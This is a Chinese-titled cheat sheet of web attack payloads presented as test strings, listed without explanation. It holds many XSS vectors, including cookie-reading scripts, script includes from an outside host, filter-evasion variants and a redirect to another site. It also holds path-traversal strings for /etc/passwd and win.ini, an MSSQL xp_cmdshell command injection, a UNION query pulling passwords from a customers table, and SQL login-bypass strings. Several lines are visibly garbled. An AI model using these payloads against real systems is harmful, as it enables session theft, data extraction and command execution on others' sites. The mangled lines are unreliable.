XSS攻击测试语句大全

跨站脚本=XSS攻击测试语句大全

url: %3C=<   %3E=>   %22="   %2e=.   (=%28   '=%27    )=%29   /=%2F   ;=%3B
hex:0x3C=< 0x3E=> 0x22=" 0x2e=. (=0x28 '=0x27   )=0x29 /=0x2F ;=0x3B
     &#x3c

<script>alert('xss')</script>   ==0x3C7363726970743E616C657274282778737327293C2F7363726970743E
<script>document.location='http://www.tjs8.cn'</script>
><script>alert('xss')</script><
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<img src=\'#\'"
<img src=\'#\'" onerror=alert(/xss/)>
<img src=\'#\'" style="Xss:expression(alert(/xss/));">
<img src=\'#\'"
<img src=javascript:alert('XSS')>
<img src=JaVaScRiPt:alert('XSS')>
<img src=JaVaScRiPt:alert(&quot;XSS&quot;)>
<img src=javascript:alert("XSS")>
<img src=\'#\'"
<img src=\'#\'" vascript:alert('XSS');">
<img src=\'#\'" ascript:alert('XSS');">
<img src=\'#\'" script:alert('XSS');">
"<img src=javascript:alert(\"XSS\")>";' > out
<img src=\'#\'" javascript:alert('XSS');">
<script>a=/XSS/alert(a.source)</script>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\'#\'"
<IMG LOWSRC=\'#\'"
<BGSOUND src=\'#\'"
<br size="&{alert('XSS')}">
<layer src=\'#\'" target="_blank">http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<img src='vbscript:msgbox("XSS")'>
<img src=\'#\'"
<img src=\'#\'"
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url('" target="_blank">http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<XML SRC=\'#\'"
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT SRC=\'#\'" target="_blank">http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC=\'#\'"
<IMG SRC=\'#\'"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<IMG SRC=\'#\'" target="_blank">http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC=\'#\'" target="_blank">http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC=\'#\'" target="_blank">http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '' SRC=\'#\'" target="_blank">http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a='>'" SRC=\'#\'" target="_blank">http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC=\'#\'" target="_blank">http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
&lt;script&gt;alert('Vulnerable');&lt;/script&gt
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
'or''='
'or'='or'
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a